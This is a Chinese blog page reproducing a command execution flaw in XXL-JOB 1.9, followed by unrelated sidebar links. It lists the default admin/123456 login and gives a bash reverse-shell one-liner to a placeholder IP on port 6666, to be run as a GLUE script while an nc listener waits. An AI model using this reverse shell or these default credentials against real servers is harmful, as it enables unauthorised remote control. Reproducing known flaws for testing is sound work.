当前位置:网站首页>复现XXL-JOB 任务调度中心后台任意命令执行漏洞
复现XXL-JOB 任务调度中心后台任意命令执行漏洞
2022-07-30 04:30:00 【xiaochuhe.】
警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保
目录
一、漏洞描述
XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限。
二、影响版本
- xxl-job 1.9版本系统
三、漏洞复现
1.默认口令admin/123456,登录后台增加一个任务


2.点击 GLUE IDE编辑脚本,输入下列命令:
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/6666 <&1'


3.vps nc开始进行开启监听:

4.点击进行执行,反弹shell


边栏推荐
- What is CDH/CDP?
- Charles replaces the interface response information
- Taobao H5 interface to obtain app data 6.0 format
- The implementation and basic operation of sub-database sub-table, ER table, global table, fragmentation rules, global sequence, etc. in MyCat
- file system two
- Unity3D Application模拟进入前后台及暂停
- Shanxi group (enterprises) in the second network security skills competition part problem WP (7)
- golang中如何比较struct,slice,map是否相等以及几种对比方法的区别
- LeetCode 114. Expand Binary Tree into Linked List (One Question Three Eats)
- [Awards every week] The "Edge Containers" track of the Cloud Native Programming Challenge invites you to fight!
猜你喜欢
随机推荐
@ WebServlet annotations (Servlet annotations)
error: The following untracked working tree files would be overwritten by
[SQL] at a certain correlation with a table of data update another table
High Concurrency Framework Disruptor
PyG搭建R-GCN实现节点分类
DAY17:弱口令的探测与测试
GCC Rust获批将被纳入主线代码库,或将于GCC 13中与大家见面
VUX Datetime 组件compute-days-function动态设置日期列表
【周周有奖】云原生编程挑战赛“边缘容器”赛道邀你来战!
共建共享数字世界的根:阿里云打造全面的云原生开源生态
山西省第二届网络安全技能大赛(企业组)部分赛题WP(十)
cnpm installation steps
MYSQL unique constraint
[Redis Master Cultivation Road] Jedis - the basic use of Jedis
The 2nd Shanxi Province Network Security Skills Competition (Enterprise Group) Part of the WP (9)
获取本机IP和Request的IP
[The Mystery of Cloud Native] Cloud Native Background && Definition && Detailed explanation of related technologies?
使用EFR32作为Zigbee/Thread的sniffer的用法
BGP的简单实验
我的Go+语言初体验——祝福留言小系统,让她也可以感受到你的祝福









